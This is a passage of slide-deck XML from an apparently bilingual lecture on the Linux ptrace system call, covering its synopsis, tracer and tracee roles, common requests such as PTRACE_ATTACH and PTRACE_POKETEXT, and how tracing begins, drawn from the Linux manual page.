                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>ptrace</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" sz="3600"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42</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-TW" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="標題 3"/>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3124256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2675467"/>
            <a:ext cx="8640960" cy="3450696"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>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NAME </a:t>
            </a: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zh-TW" altLang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent3">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US"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a:solidFill>
                  <a:schemeClr val="accent3">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>- process trace </a:t>
            </a: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SYNOPSIS </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="2000" b="1" i="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sz="2000" b="1" i="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include &lt;sys/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2000" b="1" i="1" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent3">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>ptrace.h</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&gt;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a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" sz="2000"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zh-TW" altLang="en-US" sz="2000"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sz="2000" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent3">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>long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enum</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__</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ptrace_request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request,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pid_t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void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void *data</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2000" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent3">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="zh-TW" sz="2000" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent3">
                  <a:lumMod val="50000"/>
                </a:schemeClr>
              </a:solidFill>
              <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2800" dirty="0"/>
              <a:t>The value of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2800" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent3">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>request</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2800" dirty="0"/>
              <a:t> determines the action to be </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2800" dirty="0" smtClean="0"/>
              <a:t>performed.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" sz="2800" b="1" dirty="0" smtClean="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標題 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>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Ptrace</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t> Protocol </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0" smtClean="0"/>
              <a:t>[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" i="1" baseline="-25000" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>高魁良</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43</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-TW" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="31446492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85000" lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>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PTRACE_ATTACH</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t> - Allows one process to attach itself to another for debugging, pausing the remote process.</a:t>
            </a:r>
          </a:p>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PTRACE_PEEKTEXT</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t> - Allows the reading of memory from another process address space.</a:t>
            </a:r>
          </a:p>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PTRACE_POKETEXT</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t> - Allows the writing of memory to another process address space.</a:t>
            </a:r>
          </a:p>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PTRACE_GETREGS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t> - Reads the current set of processor registers from a process.</a:t>
            </a:r>
          </a:p>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PTRACE_SETREGS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t> - Writes to the current set of processor registers of a process.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent3">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>PTRACE_CONT</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t> - Resumes the execution of an attached process.</a:t>
            </a:r>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44</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-TW" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="標題 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>Some Actions Specified by Argument </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request</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0"/>
              <a:t>[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>Adam Chester</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0"/>
              <a:t>]</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="13050266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804389" cy="3450696"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>The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tx1"/>
                </a:solidFill>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>system call provides a means by which one process (the "</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>tracer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>") may observe and control the execution of another process (the "</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>tracee</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>"), and examine and change the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1"/>
              <a:t>tracee's</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t> memory and registers. </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>It </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>is primarily used to implement </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>breakpoint </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>debugging and </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>system </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>call tracing.</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="標題 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>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p</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trace</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0" smtClean="0"/>
              <a:t>[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>Linux manual </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>page</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45</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-TW" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="32168921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A </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1"/>
              <a:t>tracee</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t> first needs to be attached to the tracer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>Attachment </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>and subsequent commands are per thread: in a multithreaded process, every thread can be individually attached to a (potentially different) tracer, or left not attached and thus not debugged</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>Therefore</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>, "</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1"/>
              <a:t>tracee</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>" always means "(one) thread", never "a (possibly multithreaded) process". </a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="標題 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>Tracee vs. Thread </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0"/>
              <a:t>[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0">
                <a:hlinkClick r:id="rId2"/>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46</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-TW" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="39791033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568952" cy="3450696"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1"/>
              <a:t>Ptrace</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t> commands are always sent to a specific </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1"/>
              <a:t>tracee</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t> using a call of the form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PTRACE_foo</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b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent3">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>, ...) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>where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dirty="0"/>
              <a:t> is the thread ID of the corresponding Linux thread</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>(Note that in this page, a "</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>multithreaded process</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>" means a thread group consisting of threads created using the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent3">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>clone</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>(2)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent3">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>CLONE_THREAD</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>flag.)</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="標題 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>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p</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trace</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t> call </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0"/>
              <a:t>[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0">
                <a:hlinkClick r:id="rId3"/>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47</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-TW" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="28585767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A process can initiate a trace by calling </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>fork</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>(2)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t> and having the resulting child do a </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PTRACE_TRACEME</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>, followed (typically) by an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3"/>
              </a:rPr>
              <a:t>execve</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>(2)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>Alternatively</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>, one process may commence tracing another process using </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PTRACE_ATTACH</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>or </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PTRACE_SEIZE</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="標題 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>Initialize a Trace </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0"/>
              <a:t>[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0">
                <a:hlinkClick r:id="rId4"/>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48</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-TW" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="5057974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59" y="2492896"/>
            <a:ext cx="8064897" cy="3096344"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>While being traced, the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1"/>
              <a:t>tracee</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t> will stop each time a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>signal</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t> is delivered, even if the signal is being ignored. (An exception is </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent3">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>SIGKILL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>, which has its usual effect</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>.)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="0D8110"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>ptrace</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0D8110"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>(PTRACE_ATTACH, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="0D8110"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>pid</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0D8110"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>, NULL, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0D8110"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>NULL)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>is </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>pretty straight forward, it takes the PID of the process we want to target. When called, a </a:t>
            </a:r>
            <a:r>
